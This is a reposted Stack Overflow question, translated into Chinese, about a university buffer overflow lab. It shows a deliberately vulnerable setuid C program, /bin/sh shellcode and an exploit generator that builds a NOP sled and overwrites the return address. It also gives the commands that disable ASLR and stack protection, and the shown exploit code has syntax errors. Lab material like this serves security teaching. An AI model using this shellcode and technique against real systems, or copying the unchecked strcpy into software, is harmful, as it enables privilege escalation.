gpt4 book ai didi

c - 缓冲区溢出漏洞实验室问题

转载 作者:太空宇宙 更新时间:2023-11-04 02:58:23 25 4
gpt4 key购买 nike

我有一个实验室作业,我被卡住了。基本上,我必须利用缓冲区溢出来生成具有 root 权限的 shell。我必须使用 2 个单独的 .c 文件。这是第一个:堆栈.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];

//BO Vulnerability
strcpy(buffer,str);

return 1;
}

int main(int argc, char* argv[])
{
char str[517];

FILE *badfile;
badfile = fopen("badfile","r");

fread(str, sizeof(char),517, badfile);
bof(str);

printf("Returned Properly\n");
return 1;
}

这是第二个:利用.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

我只能修改第二个。以下是我所做的更改:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350

char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */

unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}

void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
char *ptr;
long *a_ptr,ret;

int offset = DEFAULT_OFFSET;
int codeSize = sizeof(shellcode);
int buffSize = sizeof(buffer);

if(argc > 1) offset = atoi(argv[1]); //allows for command line input

ptr=buffer;
a_ptr = (long *) ptr;

/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, buffSize);

//----------------------BEGIN FILL BUFFER----------------------\\

ret = get_sp()+offset;
printf("Return Address: 0x%x\n",get_sp());
printf("Address: 0x%x\n",ret);

ptr = buffer;
a_ptr = (long *) ptr;

int i;
for (i = 0; i < 300;i+=4)
{
*(a_ptr++) = ret;
}

for(i = 486;i < codeSize + 486;++i)
{
buffer[i] = shellcode[i-486];
{
buffer[buffSize - 1] = '\0';
//-----------------------END FILL BUFFER-----------------------\\


/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer,517,1,badfile);
fclose(badfile);
}

然后我从命令行执行了以下命令

$ su root
$ Password (enter root password)
# gcc -o stack -fno-stack-protector stack.c
# chmod 4755 stack
# exit
$ gcc -o exploit exploit.c
$./exploit
$./stack

然而,虽然它确实会生成一个包含实际数据和 shell 的“坏文件”,但该 shell 仅具有基本的用户权限。之前,我确实在 root 中执行了以下命令:

echo 0 > /proc/sys/kernel/randomize_va_space

实验室说我需要在 root 中执行以下命令:

sysctl -w kernel.randomize_va_space=0

但是,如果我这样做,那么当我执行“堆栈”时,我会得到一个“非法指令”错误。有人可以帮我解决这个问题吗?

最佳答案

我想出了问题所在。我必须将 zsh 链接到/bin/bash/。我跳过了它,因为我认为只有在使用 Fedora 时才需要这样做。我使用的是 Ubuntu。

关于c - 缓冲区溢出漏洞实验室问题,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/14916004/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com